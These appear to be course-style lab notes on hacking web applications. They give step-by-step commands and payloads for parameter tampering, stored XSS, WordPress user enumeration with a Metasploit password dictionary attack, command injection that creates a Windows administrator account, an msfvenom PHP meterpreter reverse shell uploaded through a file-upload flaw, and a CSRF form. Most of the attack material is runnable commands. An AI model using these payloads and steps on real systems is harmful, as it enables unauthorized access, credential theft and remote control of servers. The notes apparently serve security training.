--- Hacking web application by manipulating the application logics via web interface
---
Hakcing web application via SQL injection attack , cross site scripting
(XSS) , cross site request foregeries (CSRF) and insecure commnication
and others
--- Web application vulnerabilities and attack such as
1. Parameter tempering
2. Cross Site Scripting (XSS)
3. Stored XSS
4. Username and Password Enumeration
5. Exploiting Wordpress Plugin Vulnerability
6. Exploiting Remote Command Execution Vulnerability
7. Web Application Auditing Framework
8. Website Vulnerability Scanning
1. Exploiting Parameter Tampering and XSS Vulnerabilities in Web Applications
--- Perform parameter tempering and XSS attack and malicious task
--- Tempering attack is attack to airmed permission , price and quantity of product
--- Performing parameter tempering and Cross Site Scripting (XSS or CSS)
---> Open a chrome and type movie website or any website we are test
---> We are login in website as a user and we logged in website and view the profile
---> We are redirected the profile page and we can see in URL there ID parameter is ID=2
---> Let's try to change ID parameter id=3 and enter we found another user profile
---> We change the ID value and getting different user profile it is called parameter tampering
---> Xss attack allows to attacker inject client side scripts
---> Click Contacts tab redirect you to Contact us page here you will performing XSS attack
---> Here we are a form in Comment feild inject script <script>alert("This is XSS attack")</script>
---> If we open the website in another browser or operating system then also execute script we inject in application
2. Enumerating and Hacking a Web Application Using WPScan and Metasploit
--- The maximum website buid in Wordpress and also enumerate the usernames
--- Crack the password by perfoming dictionary attack using msf auxiliary module
--- We are enumerating the users and dictionary attack using metasploit
Tool : Wpscan (Linux)
---> In terminal type
# wpscan --url [url or ip address]:8080/ceh --enumerate u
--->
In new terminal launch msfconsole and search auxiliary
wordpress_login_enum and perform dictionary attack using Password.txt in
wordlist folder
# msfconsole > search auxiliary wordpress_login_enum
# use auxiliary/scanner/http/wordpress_login_enum
#
show options -- PASS_FILE -- Set up password.txt file give a path ,
RHOSTS --8080 , ip address of target machine , RPORT -- 4444 ,
TARGETURI -- Enter wordpress website url , USERNAME -- Give the username
# exploit
---> When attack is completed we getiing password to the user and go to browser and open a website admin login panel
---> Login in website with we found credential as you can login in unauthentically
3. Exploiting Remote Command Execution Vulnerability to compromise a Target Web Server
--- Extract information of target machine , create user account , use account to log in target machine
--- Explointing command line execution vulnerabilities
---> Open any browser and open website to test
---> If command injection vulnerability exsist in web application we enter some payloads to getting intresting information
Payload : ping [ip or device] --- checking host is live or not
| hostname -- it is show hostname of target machine
| whoami -- extract more information about target
| tasklist -- all process running on target machine
| dir C:\ -- view the files and directories in C:\
| net user -- obtain information related to user accounts
| net user Mitesh /Add -- it will create user account name Mitesh
| net localgroup Admistrators Mitesh /Add --- It give admistrative
privileges to Mitesh account and give admin privileges
---> Start Remote Desktop Connection Application on windows and set IP address of target machine
--->
In username Mitesh is add and password feild blank and click OK. In
this way we creating remote connection using command injection
4. Exploiting File Upload Vulnerability
--- File upload vulnerability and take a advantage and make remote code with msfconsole
---> We create payload for uploading to getting reverse shell we use msfvenom and meterpreter
# msfvenom -p php/meterpreter/reverse_tcp lhost=[attacker ip address] lport=4444 -f raw
--->
Select the payload generated in php format and open Leafpad or notepad
and paste the payload and save the with .php format (payload.php)
---> Open a browser and go to that website there is file upload vulnerability
---> If website allow only specific type of format so our save is .JPEG or .PNG format
---> Open msfconsole
# use multi/handler
# set payload php/meterpreter/reverse_tcp
# set lhost [attacker ip address]
# set lport 4444
# exploit
---> Copy the path where we uploaded payload or file and enter in url
---> We get meterpreter section and we get information we want
--- Performing Cross Site Request Forgery (CSRF) Attack
--- CSRF allow an attacker to for unsuspecting user's browser to send malicious request
--- It modify and retrive account information and perform CSRF attack
---
In CSRF user click into malicious link containing arbitrary code when
user click on the link it execute arbitrary code on trusted server
---> Open a website we perform the csrf attack in chrome or firefox
---> Open the terminal and type
# wpscan -u [url]:8080 --enumerate vp
---> Type the followiing code in notepad
<form method="post"
action="url infected in csrf" >
<script>alert("Enable a security") </script>
<input type="hidden" name="whitelisted_ip[]"
value="ip address of target">
<input type="hidden" name="set_whitelist_ip"
Value="Set Whitelisted IPs" class="button-secondary">
<input type="submit">
</form>
----> Save the file as .html (security.html)
